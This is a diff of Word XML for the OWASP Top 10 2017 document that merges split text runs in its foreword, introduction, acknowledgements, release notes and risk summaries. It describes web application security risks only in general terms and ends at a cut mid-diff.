-        <w:t>ving application security increases exponentially. The rapid pace of modern software development processes makes risks even more critical to discover quickly and accurately. We can no longer afford to tolerate relatively simple security problems like those</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> presented in this OWASP Top 10.</w:t>
+        <w:t>Insecure software is undermining our financial, healthcare, defense, energy, and other critical infrastructure. As our software becomes increasingly critical, complex, and connected, the difficulty of achieving application security increases exponentially. The rapid pace of modern software development processes makes risks even more critical to discover quickly and accurately. We can no longer afford to tolerate relatively simple security problems like those presented in this OWASP Top 10.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2586,10 +2550,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">A great deal of feedback was received during the creation of the OWASP Top 10-2017, more than for any other equivalent OWASP effort. This shows how much passion the community has for the OWASP Top 10, and thus how critical </w:t>
-      </w:r>
-      <w:r>
-        <w:t>it is for OWASP to get the Top 10 right for the majority of use cases.</w:t>
+        <w:t>A great deal of feedback was received during the creation of the OWASP Top 10-2017, more than for any other equivalent OWASP effort. This shows how much passion the community has for the OWASP Top 10, and thus how critical it is for OWASP to get the Top 10 right for the majority of use cases.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2605,10 +2566,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">In this </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">release, issues and recommendations are written concisely and in a testable way to assist with the adoption of the OWASP Top 10 in application security programs. We encourage large and high performing organizations to use the </w:t>
+        <w:t xml:space="preserve">In this release, issues and recommendations are written concisely and in a testable way to assist with the adoption of the OWASP Top 10 in application security programs. We encourage large and high performing organizations to use the </w:t>
       </w:r>
       <w:hyperlink r:id="rId19">
         <w:r>
@@ -2627,13 +2585,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>We have written up a range of suggested next steps for di</w:t>
-      </w:r>
-      <w:r>
-        <w:t>fferent users of the OWASP Top 10, including "What's Next for Developers", "What's Next for Security Testers", "What's Next for Organizations“, which is suitable for CIOs and CISOs, and "What's Next for Application Managers", which is suitable for applicat</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ion managers or anyone responsible for the lifecycle of the application.</w:t>
+        <w:t>We have written up a range of suggested next steps for different users of the OWASP Top 10, including "What's Next for Developers", "What's Next for Security Testers", "What's Next for Organizations“, which is suitable for CIOs and CISOs, and "What's Next for Application Managers", which is suitable for application managers or anyone responsible for the lifecycle of the application.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2641,10 +2593,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>In the long term, we encourage all software development teams and organizations to create an application security program that is compatible with your culture and technology. These pr</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ograms come in all shapes and sizes. Leverage your organization's existing strengths to measure and improve your application security program using the Software Assurance Maturity Model.</w:t>
+        <w:t>In the long term, we encourage all software development teams and organizations to create an application security program that is compatible with your culture and technology. These programs come in all shapes and sizes. Leverage your organization's existing strengths to measure and improve your application security program using the Software Assurance Maturity Model.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2652,10 +2601,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">We hope that the OWASP Top 10 is useful to your application security </w:t>
-      </w:r>
-      <w:r>
-        <w:t>efforts. Please don't hesitate to contact OWASP with your questions, comments, and ideas at our GitHub project repository:</w:t>
+        <w:t>We hope that the OWASP Top 10 is useful to your application security efforts. Please don't hesitate to contact OWASP with your questions, comments, and ideas at our GitHub project repository:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2680,10 +2626,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">You can find the OWASP Top 10 project </w:t>
-      </w:r>
-      <w:r>
-        <w:t>and translations here:</w:t>
+        <w:t>You can find the OWASP Top 10 project and translations here:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2744,10 +2687,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Neil Smithli</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ne</w:t>
+        <w:t>Neil Smithline</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2839,13 +2779,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>This major update adds several new issues, including two issues selected by the community - A8:2017-Insecure Deserialization and A10:2017-In</w:t>
-      </w:r>
-      <w:r>
-        <w:t>sufficient Logging and Monitoring. Two key differentiators from previous OWASP Top 10 editions are the substantial community feedback in addition to the extensive data assembled from dozens of organizations (possibly the largest amount of data ever assembl</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ed in the preparation of an application security standard). This provides us with additional confidence that the new OWASP Top 10 addresses the most urgent application security issues currently facing organizations.</w:t>
+        <w:t>This major update adds several new issues, including two issues selected by the community - A8:2017-Insecure Deserialization and A10:2017-Insufficient Logging and Monitoring. Two key differentiators from previous OWASP Top 10 editions are the substantial community feedback in addition to the extensive data assembled from dozens of organizations (possibly the largest amount of data ever assembled in the preparation of an application security standard). This provides us with additional confidence that the new OWASP Top 10 addresses the most urgent application security issues currently facing organizations.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2853,13 +2787,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>The OWASP Top 10 for 2017 is based prima</w:t>
-      </w:r>
-      <w:r>
-        <w:t>rily on 40+ data submissions from firms that specialize in application security and an industry survey that was completed by 515 individuals. This data spans vulnerabilities gathered from hundreds of organizations and over 100,000 real-world applications a</w:t>
-      </w:r>
-      <w:r>
-        <w:t>nd APIs. The Top 10 items are selected and prioritized according to this prevalence data, in combination with consensus estimates of exploitability, detectability, and impact.</w:t>
+        <w:t>The OWASP Top 10 for 2017 is based primarily on 40+ data submissions from firms that specialize in application security and an industry survey that was completed by 515 individuals. This data spans vulnerabilities gathered from hundreds of organizations and over 100,000 real-world applications and APIs. The Top 10 items are selected and prioritized according to this prevalence data, in combination with consensus estimates of exploitability, detectability, and impact.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2867,13 +2795,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>A primary aim of the OWASP Top 10 is to educate developers, designers, architect</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s, managers, and organizations about the consequences of the most common and most important web application security weaknesses. The Top 10 provides basic techniques to protect against these high risk problem areas, and provides guidance on where to go fro</w:t>
-      </w:r>
-      <w:r>
-        <w:t>m here.</w:t>
+        <w:t>A primary aim of the OWASP Top 10 is to educate developers, designers, architects, managers, and organizations about the consequences of the most common and most important web application security weaknesses. The Top 10 provides basic techniques to protect against these high risk problem areas, and provides guidance on where to go from here.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2904,13 +2826,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWASP Developer's Gu</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>ide</w:t>
+          <w:t>OWASP Developer's Guide</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
@@ -2925,10 +2841,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t>. These are essential reading for anyone developing web applications and APIs. Guidance on how to effectively find vulnerabilities in web applicatio</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">ns and APIs is provided in the </w:t>
+        <w:t xml:space="preserve">. These are essential reading for anyone developing web applications and APIs. Guidance on how to effectively find vulnerabilities in web applications and APIs is provided in the </w:t>
       </w:r>
       <w:hyperlink r:id="rId26">
         <w:r>
@@ -2953,10 +2866,7 @@
         <w:t>Constant change</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">. The OWASP Top 10 will continue to change. Even without changing a single line of your application's code, you may </w:t>
-      </w:r>
-      <w:r>
-        <w:t>become vulnerable as new flaws are discovered and attack methods are refined. Please review the advice at the end of the Top 10 in What's Next For Developers, Testers, Organizations and Application Managers for more information.</w:t>
+        <w:t>. The OWASP Top 10 will continue to change. Even without changing a single line of your application's code, you may become vulnerable as new flaws are discovered and attack methods are refined. Please review the advice at the end of the Top 10 in What's Next For Developers, Testers, Organizations and Application Managers for more information.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2970,10 +2880,7 @@
         <w:t>Think positive</w:t>
       </w:r>
       <w:r>
-        <w:t>. When you're</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> ready to stop chasing vulnerabilities and focus on establishing strong application security controls, the </w:t>
+        <w:t xml:space="preserve">. When you're ready to stop chasing vulnerabilities and focus on establishing strong application security controls, the </w:t>
       </w:r>
       <w:hyperlink r:id="rId27">
         <w:r>
@@ -2984,10 +2891,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> project provides a starting point to help develo</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">pers build security into their applications and the </w:t>
+        <w:t xml:space="preserve"> project provides a starting point to help developers build security into their applications and the </w:t>
       </w:r>
       <w:hyperlink r:id="rId28">
         <w:r>
@@ -3012,13 +2916,7 @@
         <w:t>Use tools wisely</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Security vulnerabilities can be quite complex and deeply buried in code. In many cases, the most cost-effective approach for finding and eliminating these weaknesses is human experts armed with good tools. Relying on tools alone provides a false sense of s</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ecurity and is not recommended.</w:t>
+        <w:t>. Security vulnerabilities can be quite complex and deeply buried in code. In many cases, the most cost-effective approach for finding and eliminating these weaknesses is human experts armed with good tools. Relying on tools alone provides a false sense of security and is not recommended.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3062,10 +2960,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>We'd like to thank the organizations that contributed their vulnerability data to support the 2017 update. We received more than 40 responses to the call for data. For the first time, all the dat</w:t>
-      </w:r>
-      <w:r>
-        <w:t>a contributed to a Top 10 release, and the full list of contributors, is publicly available. We believe this is one of the larger, more diverse collections of vulnerability data ever collected publicly.</w:t>
+        <w:t>We'd like to thank the organizations that contributed their vulnerability data to support the 2017 update. We received more than 40 responses to the call for data. For the first time, all the data contributed to a Top 10 release, and the full list of contributors, is publicly available. We believe this is one of the larger, more diverse collections of vulnerability data ever collected publicly.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3073,13 +2968,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>As there are more contributors than space here, we ha</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ve created a dedicated page to recognize the contributions made. We wish to give heartfelt thanks to these organizations for being willing to be on the front lines by publicly sharing vulnerability data from their efforts. We hope this will continue to gro</w:t>
-      </w:r>
-      <w:r>
-        <w:t>w and encourage more organizations to do the same and possibly be seen as one of the key milestones of evidence based security. The OWASP Top 10 would not be possible without these amazing contributions. </w:t>
+        <w:t>As there are more contributors than space here, we have created a dedicated page to recognize the contributions made. We wish to give heartfelt thanks to these organizations for being willing to be on the front lines by publicly sharing vulnerability data from their efforts. We hope this will continue to grow and encourage more organizations to do the same and possibly be seen as one of the key milestones of evidence based security. The OWASP Top 10 would not be possible without these amazing contributions. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3087,13 +2976,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>A big thank you to the more than 500 individuals wh</w:t>
-      </w:r>
-      <w:r>
-        <w:t>o took the time to complete the industry ranked survey. Your voice helped determine two new additions to the Top 10. The additional comments, notes of encouragement, and criticisms were all appreciated. We know your time is valuable and we wanted to say th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>anks.</w:t>
+        <w:t>A big thank you to the more than 500 individuals who took the time to complete the industry ranked survey. Your voice helped determine two new additions to the Top 10. The additional comments, notes of encouragement, and criticisms were all appreciated. We know your time is valuable and we wanted to say thanks.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3109,10 +2992,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>And finally, we'd like to thank in advan</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ce all the translators out there who will translate this release of the Top 10 into numerous different languages, helping to make the OWASP Top 10 more accessible to the entire planet.</w:t>
+        <w:t>And finally, we'd like to thank in advance all the translators out there who will translate this release of the Top 10 into numerous different languages, helping to make the OWASP Top 10 more accessible to the entire planet.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3143,13 +3023,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Change has accelerated</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> over the last four years, and the OWASP Top 10 needed to change. We've completely refactored the OWASP Top 10, revamped the methodology, utilized a new data call process, worked with the community, re-ordered our risks, re-written each risk from the groun</w:t>
-      </w:r>
-      <w:r>
-        <w:t>d up, and added references to frameworks and languages that are now commonly used.</w:t>
+        <w:t>Change has accelerated over the last four years, and the OWASP Top 10 needed to change. We've completely refactored the OWASP Top 10, revamped the methodology, utilized a new data call process, worked with the community, re-ordered our risks, re-written each risk from the ground up, and added references to frameworks and languages that are now commonly used.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3169,10 +3043,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Microservices written in node.js and Spring Boot are replacing traditional monolithic applications. Microservices comes with their own security challenges including establishing trust between microservices, containers, secrets management, etc. Old code nev</w:t>
-      </w:r>
-      <w:r>
-        <w:t>er expected to be communicated with directly from the Internet is now sitting behind an API or RESTful web service to be consumed by SPAs and mobile applications. The base assumptions by the code, such as trusted callers, are no longer valid.</w:t>
+        <w:t>Microservices written in node.js and Spring Boot are replacing traditional monolithic applications. Microservices comes with their own security challenges including establishing trust between microservices, containers, secrets management, etc. Old code never expected to be communicated with directly from the Internet is now sitting behind an API or RESTful web service to be consumed by SPAs and mobile applications. The base assumptions by the code, such as trusted callers, are no longer valid.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3184,10 +3055,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Single page a</w:t>
-      </w:r>
-      <w:r>
-        <w:t>pplications, written in JavaScript frameworks such as Angular and React, allow the creation of highly modular feature-rich front ends. Client-side functionality that has traditionally been delivered server-side brings its own security challenges.</w:t>
+        <w:t>Single page applications, written in JavaScript frameworks such as Angular and React, allow the creation of highly modular feature-rich front ends. Client-side functionality that has traditionally been delivered server-side brings its own security challenges.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3199,10 +3067,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>JavaScrip</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t is now the primary language of the web with node.js running server side and modern web frameworks such as Bootstrap, Electron, Angular, and React providing on the client.</w:t>
+        <w:t>JavaScript is now the primary language of the web with node.js running server side and modern web frameworks such as Bootstrap, Electron, Angular, and React providing on the client.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3230,10 +3095,7 @@
         <w:t>A4:2017-XML External Entities (XXE)</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> is a new category</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> primarily supported by source code analysis security testing tools (</w:t>
+        <w:t xml:space="preserve"> is a new category primarily supported by source code analysis security testing tools (</w:t>
       </w:r>
       <w:hyperlink r:id="rId30">
         <w:r>
@@ -3277,13 +3139,7 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>A8:2017-Ins</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>ecure Deserialization</w:t>
+        <w:t>A8:2017-Insecure Deserialization</w:t>
       </w:r>
       <w:r>
         <w:t>, which permits remote code execution or sensitive object manipulation on affected platforms.</w:t>
@@ -3304,10 +3160,7 @@
         <w:t>A10:2017-Insufficient Logging and Monitoring</w:t>
       </w:r>
       <w:r>
-        <w:t>, the lack of which can prevent or significantly delay malicious activity and breach detection, i</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ncident response, and digital forensics.</w:t>
+        <w:t>, the lack of which can prevent or significantly delay malicious activity and breach detection, incident response, and digital forensics.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3371,10 +3224,7 @@
         <w:t>A8-Cross-Site Request Forgery (CSRF)</w:t>
       </w:r>
       <w:r>
-        <w:t>, Frameworks commonly inclu</w:t>
-      </w:r>
-      <w:r>
-        <w:t>de CSRF defenses, with &lt; 5% of all apps, now #13.</w:t>
+        <w:t>, Frameworks commonly include CSRF defenses, with &lt; 5% of all apps, now #13.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3475,10 +3325,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Attackers can potentially use</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> many different paths through your application to do harm to your business or organization. Each of these paths represents a risk that may, or may not, be serious enough to warrant attention.</w:t>
+        <w:t>Attackers can potentially use many different paths through your application to do harm to your business or organization. Each of these paths represents a risk that may, or may not, be serious enough to warrant attention.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3537,13 +3384,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>Sometimes these paths are trivial to find and exploit, and som</w:t>
-      </w:r>
-      <w:r>
-        <w:t>etimes they are extremely difficult. Similarly, the harm that is caused may be of no consequence, or it may put you out of business. To determine the risk to your organization, you can evaluate the likelihood associated with each threat agent, attack vecto</w:t>
-      </w:r>
-      <w:r>
-        <w:t>r, and security weakness and combine it with an estimate of the technical and business impact to your organization. Together, these factors determine your overall risk.</w:t>
+        <w:t>Sometimes these paths are trivial to find and exploit, and sometimes they are extremely difficult. Similarly, the harm that is caused may be of no consequence, or it may put you out of business. To determine the risk to your organization, you can evaluate the likelihood associated with each threat agent, attack vector, and security weakness and combine it with an estimate of the technical and business impact to your organization. Together, these factors determine your overall risk.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3568,20 +3409,11 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWASP Top 1</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>0</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> focuses on identifying the most serious risks for a broad array of organizations. For each of these risks, we provide generic information about likelihood and technical impact using the following simple ratings scheme, which is based on the OWASP Risk Ra</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ting Methodology.  </w:t>
+          <w:t>OWASP Top 10</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> focuses on identifying the most serious risks for a broad array of organizations. For each of these risks, we provide generic information about likelihood and technical impact using the following simple ratings scheme, which is based on the OWASP Risk Rating Methodology.  </w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -3967,13 +3799,7 @@
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Each organization is unique, and so ar</w:t>
-      </w:r>
-      <w:r>
-        <w:t>e the threat actors for that organization, their goals, and the impact of any breach. If a public interest organization uses a content management system (CMS) for public information and a health system uses that same exact CMS for sensitive health records,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> the threat actors and business impacts can be very different for the same software. It is critical to understand the risk to your organization based on applicable threat agents and business impacts.</w:t>
+        <w:t>Each organization is unique, and so are the threat actors for that organization, their goals, and the impact of any breach. If a public interest organization uses a content management system (CMS) for public information and a health system uses that same exact CMS for sensitive health records, the threat actors and business impacts can be very different for the same software. It is critical to understand the risk to your organization based on applicable threat agents and business impacts.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3981,10 +3807,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>Where possible, the names of the risks in the Top 10 are</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> aligned with </w:t>
+        <w:t xml:space="preserve">Where possible, the names of the risks in the Top 10 are aligned with </w:t>
       </w:r>
       <w:hyperlink r:id="rId35">
         <w:r>
@@ -4075,13 +3898,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t xml:space="preserve">ISO 31000: Risk Management </w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>Std</w:t>
+          <w:t>ISO 31000: Risk Management Std</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -4132,13 +3949,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>AS</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>D Strategic Mitigations (AU)</w:t>
+          <w:t>ASD Strategic Mitigations (AU)</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -4185,10 +3996,7 @@
       <w:bookmarkEnd w:id="33"/>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>T10 OWASP Top 10 Applicatio</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n Security Risks – 2017</w:t>
+        <w:t>T10 OWASP Top 10 Application Security Risks – 2017</w:t>
       </w:r>
       <w:bookmarkEnd w:id="34"/>
     </w:p>
@@ -4260,10 +4068,7 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data witho</w:t>
-            </w:r>
-            <w:r>
-              <w:t>ut proper authorization.</w:t>
+              <w:t>Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4291,10 +4096,7 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other imple</w:t>
-            </w:r>
-            <w:r>
-              <w:t>mentation flaws to assume other users' identities (temporarily or permanently).</w:t>
+              <w:t>Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users' identities (temporarily or permanently).</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4322,10 +4124,7 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify su</w:t>
-            </w:r>
-            <w:r>
-              <w:t>ch weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection, such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.</w:t>
+              <w:t>Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection, such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4340,26 +4139,20 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>A4:2017-XML Externa</w:t>
-            </w:r>
-            <w:r>
-              <w:t>l Entities (XXE)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, rem</w:t>
-            </w:r>
-            <w:r>
-              <w:t>ote code execution, and denial of service attacks, such as the Billion Laughs attack.</w:t>
+              <w:t>A4:2017-XML External Entities (XXE)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+            </w:pPr>
+            <w:r>
+              <w:t>Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks, such as the Billion Laughs attack.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4387,10 +4180,7 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access una</w:t>
-            </w:r>
-            <w:r>
-              <w:t>uthorized functionality and/or data, such as access other users' accounts, view sensitive files, modify other users' data, change access rights, etc.</w:t>
+              <w:t>Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users' accounts, view sensitive files, modify other users' data, change access rights, etc.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4418,10 +4208,7 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, in-complete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive i</w:t>
-            </w:r>
-            <w:r>
-              <w:t>nformation. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must also be patched/upgraded in a timely fashion.</w:t>
+              <w:t>Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, in-complete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must also be patched/upgraded in a timely fashion.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4449,13 +4236,7 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>XSS flaws occur whenever an application include</w:t>
-            </w:r>
-            <w:r>
-              <w:t>s untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim's browser which can hija</w:t>
-            </w:r>
-            <w:r>
-              <w:t>ck user sessions, deface web sites, or redirect the user to malicious sites.</w:t>
+              <w:t>XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4483,10 +4264,7 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be </w:t>
-            </w:r>
-            <w:r>
-              <w:t>used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.</w:t>
+              <w:t>Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4519,17 +4297,11 @@
             </w:pPr>
             <w:r>
               <w:lastRenderedPageBreak/>
-              <w:t>Components, such as libraries, frameworks, and other software modules, run with the same privileges</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> as the application. If a vulnerable component is exploited, such </w:t>
+              <w:t xml:space="preserve">Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such </w:t>
             </w:r>
             <w:r>
               <w:lastRenderedPageBreak/>
-              <w:t>an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> and impacts.</w:t>
+              <w:t>an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4558,10 +4330,7 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, </w:t>
-            </w:r>
-            <w:r>
-              <w:t>and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.</w:t>
+              <w:t>Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4718,26 +4487,20 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
